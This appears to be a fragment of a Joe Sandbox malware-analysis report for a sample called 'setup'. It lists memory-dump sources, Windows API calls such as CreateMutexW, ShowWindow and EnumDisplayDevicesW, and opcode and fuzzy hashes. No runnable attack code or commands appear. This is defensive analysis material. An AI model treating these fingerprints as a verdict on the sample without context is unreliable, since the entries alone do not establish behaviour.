                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: mallocmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 4276657696-0
                                                                                                    • Opcode ID: ad6066a9917df3bdf3fb9e12f9afcffb5a16baba10dd29cefa5dbbfc7e9ba223
                                                                                                    • Instruction ID: 989331ef45f5cc21f7b6ede20e144a1d1595d2847333f8a4a4b86200bab592d9
                                                                                                    • Opcode Fuzzy Hash: ad6066a9917df3bdf3fb9e12f9afcffb5a16baba10dd29cefa5dbbfc7e9ba223
                                                                                                    • Instruction Fuzzy Hash: E3E0ECB19197115BCB00FF29998140ABAE4BF59654F42496DF888A7302D730D9508B92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00247650: VerSetConditionMask.KERNEL32 ref: 002476A6
                                                                                                      • Part of subcall function 00247650: VerSetConditionMask.KERNEL32 ref: 002476C2
                                                                                                      • Part of subcall function 00247650: VerSetConditionMask.KERNEL32 ref: 002476DE
                                                                                                    • DefWindowProcW.USER32 ref: 0024B0DF
                                                                                                    • SetWindowPos.USER32 ref: 0024C50C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConditionMask$Window$Proc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2534664883-0
                                                                                                    • Opcode ID: 62ab209caebcc1a5ee57053681bc17279f0c7bc05ccbbf9e97402af66e84cfbd
                                                                                                    • Instruction ID: 114381a38fe4505d2b912f5fbc2a6018f6419c1428278c0c7b84746833bf83cc
                                                                                                    • Opcode Fuzzy Hash: 62ab209caebcc1a5ee57053681bc17279f0c7bc05ccbbf9e97402af66e84cfbd
                                                                                                    • Instruction Fuzzy Hash: AC010272A19300EFC360AF29D18466ABBF4FF84301F518C1DE8D992251E73488608F43
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ProcShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2377915770-0
                                                                                                    • Opcode ID: 59c774923a0e817e5fb2b66acb0a95b4490ea0f5da54dcacc7ed879a308ffac6
                                                                                                    • Instruction ID: cad91f388a8fdb903549a686ee9fcf0555486c55ff035d9e80aa883710302f82
                                                                                                    • Opcode Fuzzy Hash: 59c774923a0e817e5fb2b66acb0a95b4490ea0f5da54dcacc7ed879a308ffac6
                                                                                                    • Instruction Fuzzy Hash: 01F04931B14701CAD7399F29D48876AB7E0FB80312F00882ED4A983250D335E8548B12
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32 ref: 0024B0DF
                                                                                                    • ShowWindow.USER32 ref: 0024B13E
                                                                                                      • Part of subcall function 00248F90: free.MSVCRT ref: 00249063
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ProcShowfree
                                                                                                    • String ID:
                                                                                                    • API String ID: 2251009850-0
                                                                                                    • Opcode ID: 2d47557e6da5f895238a7557a16ece7b086fbc0a37c32f810dc71398236c1359
                                                                                                    • Instruction ID: b32266cde3a1ed33731f3b31531fd92535b7fe5cbffaf81e4ae6da95c62d1665
                                                                                                    • Opcode Fuzzy Hash: 2d47557e6da5f895238a7557a16ece7b086fbc0a37c32f810dc71398236c1359
                                                                                                    • Instruction Fuzzy Hash: 1FF0E231718301DED7689F28D0447AAB7F0BF81312F01C82EE4D883650DB7598A8CB53
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32 ref: 0024B0DF
                                                                                                    • ShowWindow.USER32 ref: 0024B13E
                                                                                                      • Part of subcall function 0024AE20: ClipCursor.USER32 ref: 0024AE4A
                                                                                                      • Part of subcall function 0024AE20: ClientToScreen.USER32 ref: 0024AEB1
                                                                                                      • Part of subcall function 0024AE20: SetCursorPos.USER32 ref: 0024AEC9
                                                                                                      • Part of subcall function 0024AE20: SetCursor.USER32 ref: 0024AEEC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$Window$ClientClipProcScreenShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3400033131-0
                                                                                                    • Opcode ID: 2ad127a957a871e00f4317e1229455fedef900c8a92f22fe6f8b0e1dc02a8d84
                                                                                                    • Instruction ID: 9f155686faa37e7bd69c228d7f310152ad75c9d48a10d7da93bae2bad69da48f
                                                                                                    • Opcode Fuzzy Hash: 2ad127a957a871e00f4317e1229455fedef900c8a92f22fe6f8b0e1dc02a8d84
                                                                                                    • Instruction Fuzzy Hash: 75E03972B043008FD729AF28E44436AF7F0FF80322F00892AE49987240D7799968CB83
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32 ref: 0024B0DF
                                                                                                    • ShowWindow.USER32 ref: 0024B13E
                                                                                                      • Part of subcall function 00249900: calloc.MSVCRT ref: 00249927
                                                                                                      • Part of subcall function 00249900: memcpy.MSVCRT ref: 00249949
                                                                                                      • Part of subcall function 00249900: EnumDisplayDevicesW.USER32 ref: 00249994
                                                                                                      • Part of subcall function 00249900: EnumDisplayDevicesW.USER32 ref: 002499FC
                                                                                                      • Part of subcall function 00249900: wcscmp.MSVCRT ref: 00249A3A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DevicesDisplayEnumWindow$ProcShowcallocmemcpywcscmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 4108177171-0
                                                                                                    • Opcode ID: 087d383a31cc10a00e8ce1e35b51a440b55511233b39d81f4f7efe4bf9808e66
                                                                                                    • Instruction ID: 658ca30e2c24c65da24bc7c7d2b142f07646ceab7f00716cad26387b49946663
                                                                                                    • Opcode Fuzzy Hash: 087d383a31cc10a00e8ce1e35b51a440b55511233b39d81f4f7efe4bf9808e66
                                                                                                    • Instruction Fuzzy Hash: 39E0ED759043059ED728AF68D08476EB7E0EF50312F10882EE4DC83251D73994A48B52
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: State$ProcWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2239742768-0
                                                                                                    • Opcode ID: 5031e2d661f8bf14c7e162f7f4366eb0867554c626d4096f11b6777ad892444d
                                                                                                    • Instruction ID: 3624c31ce9923f1ecc5efdb13369d5568391e8490394f43cd4c71890ab827cde
                                                                                                    • Opcode Fuzzy Hash: 5031e2d661f8bf14c7e162f7f4366eb0867554c626d4096f11b6777ad892444d
                                                                                                    • Instruction Fuzzy Hash: CEE01A72A183008FD3259F59E48866AF7F0FB84311F50882FE8D983651E77994A48B17
                                                                                                    APIs
                                                                                                      • Part of subcall function 002473A0: WideCharToMultiByte.KERNEL32 ref: 00247432
                                                                                                      • Part of subcall function 002473A0: MapVirtualKeyW.USER32 ref: 0024746C
                                                                                                      • Part of subcall function 002473A0: ToUnicode.USER32 ref: 0024749E
                                                                                                      • Part of subcall function 002473A0: ToUnicode.USER32 ref: 002474D3
                                                                                                    • DefWindowProcW.USER32 ref: 0024B0DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unicode$ByteCharMultiProcVirtualWideWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3587877768-0
                                                                                                    • Opcode ID: f08aeeb5a78fb91d493025eb995f63837e68e8023e199bfb783d49164a713adc
                                                                                                    • Instruction ID: 5eaddbbc8fd99125820e945af783b11f2089e25b1f0cd225641102aeb1fef9d7
                                                                                                    • Opcode Fuzzy Hash: f08aeeb5a78fb91d493025eb995f63837e68e8023e199bfb783d49164a713adc
                                                                                                    • Instruction Fuzzy Hash: 1CE01272A083009FD324AF28E44075AFBE0FF80322F00892AE89883201E73494289B82
                                                                                                    APIs
                                                                                                    • CreateMutexW.KERNEL32(?,?,?,?,?,?,001C71ED), ref: 001C5136
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateMutex
                                                                                                    • String ID:
                                                                                                    • API String ID: 1964310414-0
                                                                                                    • Opcode ID: 7e7aba2ec1403b9bc40075787bd0a5b94fc794dd2b7409bbaacbca98db1ef898
                                                                                                    • Instruction ID: 9930b20c3f8ba993c0b3357da3c26d01f0bf9a4bcde993fdba930923efc2bce9
                                                                                                    • Opcode Fuzzy Hash: 7e7aba2ec1403b9bc40075787bd0a5b94fc794dd2b7409bbaacbca98db1ef898
                                                                                                    • Instruction Fuzzy Hash: ACE0B6B04053008FD700AF68C69830A7FF0BB88305F4485ADE8884F346D3BA84548F96
                                                                                                    APIs
                                                                                                    • TlsFree.KERNEL32(?,?,?,?,00000000,0023F0D7,-00000004,00000001,0044EB60,0023F700,?,?,?,?,0139290C,001C7311), ref: 0024A784
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3978063606-0
                                                                                                    • Opcode ID: 78c2532096b9202e6fa53ed971df674b1394079a6772333400f07b0740789ac2
                                                                                                    • Instruction ID: 985f13c0c61f08bea6bbaf8ff04d7897143891fd9b202fd5a56eb133b60c5843
                                                                                                    • Opcode Fuzzy Hash: 78c2532096b9202e6fa53ed971df674b1394079a6772333400f07b0740789ac2
                                                                                                    • Instruction Fuzzy Hash: 82D067B55002448BDB10AF68DAC97197BF4BB05305F448598D8458F34AE775D8148B92
